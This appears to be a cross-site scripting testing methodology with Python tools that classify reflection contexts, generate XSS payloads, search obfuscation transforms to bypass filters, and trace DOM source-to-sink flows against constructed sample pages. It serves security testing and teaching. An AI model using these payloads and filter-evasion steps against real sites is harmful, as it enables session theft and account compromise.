XSS Methodology

Discovery and Mapping:

Enumerate all endpoints, parameters, and user inputs.

Identify entry points such as query parameters, request bodies, and HTTP headers.

Generate Test Inputs:

Use a unique, easy-to-search value (a canary) for each entry point, so that any reflection, in the immediate response or in a later one, can be traced back to the exact input that produced it.

Inject these values to observe if and how they're reflected or stored.

Submit and Observe:

Submit the test inputs to all identified entry points.

Monitor both the immediate and subsequent HTTP responses for reflection or persistence of the input data.

Context Analysis:

Analyse where and how the input is reflected or stored in the application.

Pay attention to the surrounding context: HTML text, an attribute value (and whether it is quoted), a JavaScript string or code block, an HTML comment, or a URL attribute such as href. Also note which special characters (' " < >) come back intact, encoded or stripped; together these determine which payloads can work.

Crafting XSS Payloads:

Create payloads suitable for the identified contexts.

Alternatively, use a pre-made payload list, filtered to the contexts identified in the previous step rather than fired at every input.
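Worked example, added here and not code from the original page: the Generate Test Inputs, Submit and Observe, Context Analysis and Crafting XSS Payloads steps as one small Python probe. It runs offline against a constructed sample response (sample_response), which stands in for the target; the canary format, the probe characters, the list of recognised encodings and the payload strings are all assumptions of this example. In a real run, fetch would send the request through your proxy and return the body.

```python
import html
import re
import secrets
PROBE_CHARS = "'\"<>"                    # appended to every canary; their fate decides the payload
_ENCODED = {"'": ("&#39;", "&#x27;", "&apos;", "\\'"), '"': ("&quot;", "&#34;", "&#x22;", '\\"'),
            "<": ("&lt;", "&#60;", "&#x3c;"), ">": ("&gt;", "&#62;", "&#x3e;")}  # server-side encodings
_SCRIPT_OPEN, _SCRIPT_CLOSE = re.compile(r"<script\b[^>]*>", re.I), re.compile(r"</script\s*>", re.I)
_ATTR_TAIL = re.compile(r"([\w:-]+)\s*=\s*(\"[^\"]*|'[^']*|[^\s\"'>]*)$")  # unfinished attribute at tag end
IMG = "<img src=x onerror=alert(document.domain)>"

def make_canaries(entry_points):
    """One unique alphanumeric canary per entry point (assumed format); the mapping is what ties a canary
    that turns up in a later response (stored XSS) back to the input that planted it."""
    return {f"zq{secrets.token_hex(4)}zq": ep for ep in entry_points}

def _probe_fate(tail):
    """Fate of each probe char, read from what follows the canary (heuristic: a stripped char followed
    by page text equal to the next probe char reads as raw, so always confirm in a browser)."""
    fate, pos = {}, 0
    for c in PROBE_CHARS:
        hit = next((e for e in (c,) + _ENCODED[c] if tail[pos:pos + len(e)].lower() == e.lower()), None)
        fate[c] = "stripped" if hit is None else "raw" if hit == c else "encoded"
        pos += len(hit or "")
    return fate

def _js_string_state(js):
    """Quote character still open at the end of `js`, or None (JS comments are ignored)."""
    quote = None
    for c in re.sub(r"\\.", "", js):    # backslash-escaped characters cannot open or close a string
        quote = None if c == quote else (c if quote is None and c in "'\"`" else quote)
    return quote

def _context(before):
    """(context, attribute name) for the position right after the markup `before`."""
    opens = [m.end() for m in _SCRIPT_OPEN.finditer(before)]
    closes = [m.end() for m in _SCRIPT_CLOSE.finditer(before)]
    if opens and (not closes or closes[-1] < opens[-1]):       # inside an unclosed <script>
        q = _js_string_state(before[opens[-1]:])
        return {None: "js_code", "'": "js_string_sq", '"': "js_string_dq", "`": "js_template"}[q], ""
    if before.rfind("<!--") > before.rfind("-->"):
        return "html_comment", ""
    lt = before.rfind("<")
    if lt == -1 or before.rfind(">") > lt:                      # not inside a tag
        return "html_text", ""
    m = _ATTR_TAIL.search(before[lt:])
    if m is None:
        return "attribute_name", ""
    return {'"': "attribute_dq", "'": "attribute_sq"}.get(m.group(2)[:1], "attribute_unquoted"), m.group(1).lower()

def classify_reflection(body, canary):
    """Each occurrence of `canary` in `body`, with its context and the fate of the probe chars."""
    out = []
    for m in re.finditer(re.escape(canary), body):
        ctx, attr = _context(body[:m.start()])
        out.append({"context": ctx, "attribute": attr, "fate": _probe_fate(body[m.end():m.end() + 40])})
    return out

def suggest_payload(f):
    """Context-fitting payload using only chars that came back raw; None means refinement is needed."""
    ctx, attr = f["context"], f["attribute"]
    raw = {c for c, s in f["fate"].items() if s == "raw"}
    tags_ok = {"<", ">"} <= raw
    q = {"js_string_sq": "'", "js_string_dq": '"'}.get(ctx)
    if q and q in raw:
        return q + ";alert(document.domain);//"
    if ctx.startswith("js_") and tags_ok:
        return "</script>" + IMG          # the HTML parser ends the script block whatever the JS state
    if ctx in ("html_text", "html_comment") and tags_ok:
        return ("-->" if ctx == "html_comment" else "") + IMG
    if ctx.startswith("attribute_"):
        if attr.startswith("on"):
            return "alert(document.domain)"   # already inside a handler; entities are decoded there
        if attr in ("href", "src", "action", "formaction"):
            return "javascript:alert(document.domain)"
        quote = {"attribute_dq": '"', "attribute_sq": "'"}.get(ctx, "")
        if not quote or quote in raw:     # close the value; in name/unquoted position just add an attribute
            return f"{quote} autofocus onfocus=alert(document.domain) x={quote}"
    return None

def run_probe(entry_points, fetch):
    """One probe per entry point; `fetch(entry_point, value)` returns the body (in real use it performs
    the HTTP request). Returns the canary map and the classified reflections."""
    canaries, report = make_canaries(entry_points), []
    for canary, ep in canaries.items():
        for f in classify_reflection(fetch(ep, canary + PROBE_CHARS), canary):
            f.update(entry_point=ep, payload=suggest_payload(f))
            report.append(f)
    return canaries, report

def sample_response(value):
    """Constructed stand-in for the target: `value` reflected in four contexts, each escaped differently."""
    return ("<html><body>\n"
            f"<p>Results for {html.escape(value)}</p>\n"                 # text, entity-encoded
            f'<input type="text" name="q" value="{value}">\n'          # attribute, unescaped
            f"<script>var q = '{value.replace(chr(39), chr(92) + chr(39))}';</script>\n"  # JS, quote escaped only
            f"<!-- debug: {value} -->\n"                               # comment, unescaped
            "</body></html>")

if __name__ == "__main__":
    for f in run_probe(["q"], lambda ep, value: sample_response(value))[1]:
        print(f["context"], f["attribute"], f["fate"], "->", f["payload"])
```

On the sample page the same input lands in four places and gets four different answers: the text context entity-encodes everything (no payload without refinement), the attribute and comment contexts return all four characters raw, and the JavaScript string escapes the quote but leaves < and > alone, so the breakout goes through a closing script tag rather than through the string. Keep the returned canary map for the whole engagement; searching every later response for its keys is how stored reflections are tied back to the request that planted them.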

Payload Testing:

Fuzz with the crafted payloads.

For reflected XSS, test if the payload is reflected in the immediate response.

For stored XSS, check if the payload persists in storage and is executed in subsequent responses.

Browser Execution:

Execute the payloads in a browser to verify script execution. A reflection seen in the proxy is not a finding on its own: a Content Security Policy, a non-HTML Content-Type, or client-side escaping can still prevent the script from running.

Document Reflections and Payload Execution:

Document the precise location and context of each reflected, stored, or DOM-based input, together with the request that produced it and the characters that survived, so the finding can be reproduced.

Exploit Refinement:

If the initial payloads are blocked or sanitized, refine them: change case, switch to a different tag or event handler, or use alternative encodings (HTML entities inside attribute values, JavaScript Unicode escapes inside script, URL encoding on the transport) and obfuscation that the filter does not normalize but the browser still decodes.
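Added example of the refinement step (not code from the original page): a handful of encoding and obfuscation transforms and a breadth-first search that composes them until a variant gets past a filter. naive_filter is a constructed, case-sensitive substring blocklist standing in for the target's sanitizer, not any real product; which transforms work depends on the real filter, and every surviving variant still has to be confirmed in a browser.

```python
import re

def _alt_case(s):
    return "".join(c.upper() if i % 2 else c.lower() for i, c in enumerate(s))

def mixed_case(p):
    """Tag and attribute names are case-insensitive to the HTML parser; a case-sensitive filter is not."""
    p = re.sub(r"<(\w+)", lambda m: "<" + _alt_case(m.group(1)), p)
    return re.sub(r"(?<=\s)(\w+)(?==)", lambda m: _alt_case(m.group(1)), p)

def entity_encode_js(p):
    """Entity-encode the body of an inline event handler. The parser decodes character references
    in attribute values before the JS engine sees them, so &#97;lert(1) runs as alert(1).
    Only changes payloads that carry an on*= handler."""
    return re.sub(r"(\son\w+=)([^>]+)",
                  lambda m: m.group(1) + "".join(f"&#{ord(c)};" for c in m.group(2)), p, flags=re.I)

def unicode_escape(p):
    """JavaScript identifiers may contain \\uXXXX escapes: \\u0061lert is alert to the engine but not
    to a string match. Works in <script> text and, after entity decoding, in handler attributes."""
    return re.sub(r"\balert\b", r"\\u0061lert", p)

def no_parens(p):
    """alert`1` is a tagged-template call: same effect, no parentheses for a filter to key on."""
    return re.sub(r"alert\(([^()]*)\)", r"alert`\1`", p)

def alt_vector(p):
    """Swap the element/event pair for one the blocklist may not name."""
    return p.replace("<img src=x onerror=", "<svg onload=")

TRANSFORMS = [("mixed_case", mixed_case), ("entity_encode_js", entity_encode_js),
              ("unicode_escape", unicode_escape), ("no_parens", no_parens), ("alt_vector", alt_vector)]

BLOCKLIST = ("<script", "onerror", "onload", "javascript:", "alert(")

def naive_filter(s):
    """Constructed stand-in for the target's filter, not any real product: a case-sensitive substring
    blocklist, which is exactly the weakness the transforms above are aimed at. True means blocked."""
    return any(bad in s for bad in BLOCKLIST)

def refine(payload, blocked, transforms=TRANSFORMS, max_depth=2):
    """Breadth-first search over compositions of transforms, shallowest first; returns
    (variant, names applied) for the first variant `blocked` lets through, else None.
    Shallow wins because every extra layer is one more thing that must still decode in the browser."""
    if not blocked(payload):
        return payload, []
    frontier = [(payload, [])]
    for _ in range(max_depth):
        nxt = []
        for cur, applied in frontier:
            for name, fn in transforms:
                cand = fn(cur)
                if name in applied or cand == cur:
                    continue
                if not blocked(cand):
                    return cand, applied + [name]
                nxt.append((cand, applied + [name]))
        frontier = nxt
    return None

if __name__ == "__main__":
    for p in ("<img src=x onerror=alert(1)>", "';alert(1);//"):
        print(p, "->", refine(p, naive_filter))
```

Against this filter no single transform is enough for the tag payload (mixing case hides onerror but leaves alert(, encoding the handler body hides alert( but leaves onerror), and the search finds the two-step combination; the JavaScript-string payload only needs the Unicode escape. Transforms that do not apply to a context (entity encoding on a script-string payload) leave the string unchanged and are skipped, so the search does not waste depth on them.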

Automated Scanning:

Test for Browser Quirks:

Confirm Persistent Storage (Stored XSS):

Check for Execution Context (DOM-based XSS):

For DOM-based XSS, the payload may never reach the server (a value in location.hash is not sent in the request), so use the browser developer tools: find where input from sources such as location.search, location.hash, document.referrer or window.name is read, set breakpoints on sinks such as innerHTML, document.write and eval, and confirm how the browser's JavaScript engine handles the payload along that path.
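Added example (not code from the original page): a line-by-line source-to-sink triage of a page's JavaScript, the static counterpart of stepping through it in the debugger. SAMPLE_JS is a constructed snippet standing in for the target's script; the source and sink lists and the assignment-only taint propagation are assumptions of this example, not a complete model of the DOM.

```python
import re

# DOM XSS sources (attacker-influenced reads) and sinks (writes that parse or execute).
# Both lists are assumptions of this example: enough for triage, not a complete model of the DOM.
SOURCE_RE = re.compile(
    r"\b(?:location\.(?:hash|search|href|pathname)|document\.(?:URL|documentURI|referrer|cookie)"
    r"|window\.name|event\.data|localStorage\.getItem\([^)]*\))")
SINK_RE = re.compile(
    r"\.(?:innerHTML|outerHTML)\s*=(?!=)|\.insertAdjacentHTML\(|document\.write(?:ln)?\(|\beval\("
    r"|\bsetTimeout\(\s*['\"]|\.html\(|\blocation(?:\.href)?\s*=(?!=)")
ASSIGN_RE = re.compile(r"^(?:(?:var|let|const)\s+)?(\w+)\s*=(?!=)\s*(.+)$")
PARAM_RE = re.compile(r"\.get\(\s*['\"](\w+)['\"]\s*\)")     # URLSearchParams.get('name')

def _origin(expr, tainted):
    """Source or tainted variable referenced in `expr`, or None."""
    src = SOURCE_RE.search(expr)
    if src:
        prm = PARAM_RE.search(expr)
        return {"source": src.group(0), "param": prm.group(1) if prm else None, "via": None}
    for var, info in tainted.items():
        if re.search(rf"\b{re.escape(var)}\b", expr):
            return {**info, "via": var}
    return None

def find_flows(js):
    """Source-to-sink triage for one-statement-per-line JavaScript. Taint follows plain assignments
    (`var x = <source>`, `y = x + ...`); anything fancier is left to the debugger. Strips `//` comments
    naively, so a URL inside a string literal would be cut as well."""
    tainted, flows = {}, []
    for n, line in enumerate(js.splitlines(), 1):
        stmt = line.split("//")[0].strip().rstrip(";")
        if not stmt:
            continue
        sink = SINK_RE.search(stmt)
        if sink:                                  # only what is written *into* the sink matters
            origin = _origin(stmt[sink.end():], tainted)
            if origin:
                flows.append({"line": n, "sink": re.findall(r"\w+", sink.group(0))[-1], **origin})
            continue
        asg = ASSIGN_RE.match(stmt)
        if asg:
            name, rhs = asg.groups()
            origin = _origin(rhs, tainted)
            if origin:
                tainted[name] = origin
            else:
                tainted.pop(name, None)           # reassigned from something clean: taint ends here
    return flows

def probe_url(base, flow, value):
    """Where a canary has to go to reach this flow's source. A fragment is never sent to the server,
    which is why response-based reflection checks cannot see hash-driven DOM XSS."""
    if flow["source"] == "location.hash":
        return f"{base}#{value}"
    if flow["source"] == "location.search" and flow["param"]:
        return f"{base}?{flow['param']}={value}"
    return None       # referrer, window.name, postMessage: driven from an attacker-controlled page instead

SAMPLE_JS = """\
var q = new URLSearchParams(location.search).get('q');
document.getElementById('out').innerHTML = 'Results for ' + q;   // sink: string goes through the HTML parser
var frag = decodeURIComponent(location.hash.slice(1));
document.getElementById('title').textContent = frag;              // not a sink: text node, never parsed
var label = frag + ' (beta)';
setTimeout('render("' + label + '")', 0);                          // sink: string evaluated as code
var safe = 'constant';
eval(safe);                                                        // a sink, but nothing tainted reaches it
"""   # constructed sample page script, not taken from any real application

if __name__ == "__main__":
    for flow in find_flows(SAMPLE_JS):
        print(flow, "->", probe_url("https://example.test/search", flow, "zq1zq"))
```

Two flows come out of the sample: location.search into innerHTML through q, and location.hash into a string-argument setTimeout through frag and label; the textContent write is correctly ignored, and so is eval on a value that was never tainted. The hash flow is the one the server-side canary checks cannot find, since the fragment stays in the browser, which is what probe_url makes explicit. Anything beyond straight assignments (functions, jQuery chains, postMessage handlers) is still debugger work: a breakpoint on the sink and a look at the call stack.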
